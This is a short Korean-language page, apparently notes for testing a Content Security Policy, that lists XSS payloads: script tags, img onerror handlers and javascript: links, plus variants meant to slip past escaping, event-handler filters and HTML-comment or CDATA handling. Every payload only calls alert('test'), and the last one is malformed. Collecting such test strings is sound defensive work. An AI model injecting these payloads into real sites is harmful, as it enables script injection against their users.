CSP 콘텐츠 보안정책
xss테스트
테스트 방법
<script>alert('test');</script>
<div style="display: flex; justify-content: center;">
<img src=x onerror=alert('test') style="width:auto; height:auto;">
</div>
<a href="javascript:alert('test')">Click me</a>
--------------------------------------------------------
이스케이프(escaping) 우회 시도
<scr\ipt>alert('test');</scr\ipt>
<div style="display: flex; justify-content: center;">
<img src=x onerror=alert('test') style="width:auto; height:auto;">
</div>
<a href="javascript:alert('test')">Click me</a>
--------------------------------------------------------
이벤트 핸들러 우회 시도
<div style="display: flex; justify-content: center;">
<img src=x onerror=alert('test') style="width:auto; height:auto;">
</div>
<div style="display: flex; justify-content: center;">
<img src=x onerror="alert('test')" style="width:auto; height:auto;">
</div>
<div style="display: flex; justify-content: center;">
<img src=x onerror=alert\('test'\) style="width:auto; height:auto;">
</div>
--------------------------------------------------------
HTML 주석을 이용한 우회 시도
<!--<div style="display: flex; justify-content: center;">
<img src=x onerror=alert('test') style="width:auto; height:auto;">
</div>-->
<!--><div style="display: flex; justify-content: center;">
<img src=x onerror=alert('test') style="width:auto; height:auto;">
</div><!-->
<![CDATA[<script>alert('test');</script>]]>
--------------------------------------------------------
스크립트 블록을 이용한 우회 시도:
<div style="display: flex; justify-content: center;">
<img src=x onerror="javascript:alert('test')" style="width:auto; height:auto;">
</div>
<div style="display: flex; justify-content: center;">
<img src=x onerror="data:text/html,<script style="width:auto; height:auto;">
</div>alert('test');</script>">
